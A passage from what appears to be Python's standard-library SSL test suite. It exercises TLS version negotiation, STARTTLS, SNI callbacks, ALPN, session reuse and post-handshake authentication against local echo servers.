client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
@requires_tls_version('TLSv1_2')
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(True)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.dup)
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, [bytearray(100)])
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(TimeoutError, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(TimeoutError, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
client_ctx, server_ctx, hostname = testing_context()
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
server = server_ctx.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = client_ctx.wrap_socket(
socket.socket(), server_hostname=hostname
)
client.connect((hostname, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
# OpenSSL enables all TLS 1.3 ciphers, enforce TLS 1.2 for test
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# Force different suites on client and server
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.3')
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
@requires_tls_version('TLSv1_3')
def test_tls1_3(self):
client_context, server_context, hostname = testing_context()
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@requires_tls_version('TLSv1_2')
@requires_tls_version('TLSv1')
@ignore_deprecation
def test_min_max_version_tlsv1_2(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
@requires_tls_version('TLSv1_1')
@ignore_deprecation
def test_min_max_version_tlsv1_1(self):
client_context, server_context, hostname = testing_context()
# client 1.0 to 1.2, server 1.0 to 1.1
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
@requires_tls_version('TLSv1_2')
@requires_tls_version('TLSv1')
@ignore_deprecation
def test_min_max_version_mismatch(self):
client_context, server_context, hostname = testing_context()
# client 1.0, server 1.2 (mismatch)
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
client_context.maximum_version = ssl.TLSVersion.TLSv1
client_context.minimum_version = ssl.TLSVersion.TLSv1
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@requires_tls_version('SSLv3')
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
client_context, server_context, hostname = testing_context()
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
with self.assertRaises(ssl.SSLError):
server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_npn_protocols(self):
assert not ssl.HAS_NPN
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason,
'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertEqual(catch.unraisable.exc_type, ZeroDivisionError)
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertEqual(catch.unraisable.exc_type, TypeError)
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(os_helper.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with open(os_helper.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context2.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
@unittest.skipUnless(has_tls_version('TLSv1_3'), "Test needs TLS 1.3")
class TestPostHandshakeAuth(unittest.TestCase):
def test_pha_setter(self):
protocols = [
ssl.PROTOCOL_TLS_SERVER, ssl.PROTOCOL_TLS_CLIENT
]
for protocol in protocols:
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.post_handshake_auth = True
self.assertEqual(ctx.post_handshake_auth, True)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, True)
ctx.post_handshake_auth = False
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, False)
